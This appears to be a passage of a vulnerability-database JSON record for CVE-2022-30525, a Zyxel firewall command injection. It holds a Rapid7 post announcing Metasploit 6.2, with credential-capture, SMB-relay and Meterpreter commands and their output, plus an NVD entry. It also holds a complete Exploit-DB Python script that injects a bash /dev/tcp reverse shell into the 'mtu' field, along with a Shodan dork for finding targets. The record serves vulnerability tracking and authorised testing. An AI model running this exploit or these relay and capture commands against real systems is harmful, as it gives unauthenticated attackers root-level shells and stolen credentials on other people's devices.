"RAPID7BLOG:02790CED26C6C155A03D093DB7BFF96F", "href": "https://blog.rapid7.com/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-06-03T20:33:39", "description": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T14:15:00", "type": "cve", "title": "CVE-2022-30525", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-03T18:15:00", "cpe": ["cpe:/o:zyxel:usg_flex_500_firmware:5.30"], "id": "CVE-2022-30525", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:zyxel:usg_flex_500_firmware:5.30:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-06-03T05:56:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "exploitdb", "title": "Zyxel USG FLEX 5.21 - OS Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-30525", "CVE-2022-30525"], "modified": "2022-06-03T00:00:00", "id": "EDB-ID:50946", "href": "https://www.exploit-db.com/exploits/50946", "sourceData": "# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection\r\n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\"\r\n# Date: May 18th 2022\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://www.zyxel.com\r\n# Version: ZLD5.00 thru ZLD5.21\r\n# Tested on: Linux\r\n# CVE: CVE-2022-30525\r\n\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nimport sys\r\nimport json\r\nimport base64\r\nimport requests\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n prog=\"CVE-2022-30525.py\",\r\n description=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\",\r\n)\r\nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\")\r\nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\")\r\nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\")\r\n\r\nargs = parser.parse_args()\r\n\r\nbanner = (\r\n \"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\"\r\n \"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\"\r\n \"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\"\r\n \"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\"\r\n \"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\"\r\n \"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\"\r\n \"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\"\r\n \"biA6KSApCg==\"\r\n)\r\n\r\n\r\ndef main():\r\n\r\n print(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\"))\r\n\r\n if None in vars(args).values():\r\n print(f\"[!] Please enter all parameters !\")\r\n parser.print_help()\r\n sys.exit()\r\n\r\n if \"http\" not in args.url:\r\n args.url = \"https://\" + args.url\r\n args.url += \"/ztp/cgi-bin/handler\"\r\n exploit(args.url, args.host, args.port)\r\n\r\n\r\ndef exploit(url, host, port):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\",\r\n \"Content-Type\": \"application/json\",\r\n }\r\n\r\n data = {\r\n \"command\": \"setWanPortSt\",\r\n \"proto\": \"dhcp\",\r\n \"port\": \"4\",\r\n \"vlan_tagged\": \"1\",\r\n \"vlanid\": \"5\",\r\n \"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";',\r\n \"data\": \"hi\",\r\n }\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n print(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\")\r\n\r\n try:\r\n response = requests.post(\r\n url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5\r\n )\r\n except (KeyboardInterrupt, requests.exceptions.Timeout):\r\n print(\"[!] Bye Bye hekcer !\")\r\n sys.exit(1)\r\n finally:\r\n\r\n try:\r\n print(\"[!] Can't exploit the target ! Code :\", response.status_code)\r\n\r\n except:\r\n print(\"[!] Enjoy your shell !!!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50946", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-17T04:22:57", "description": 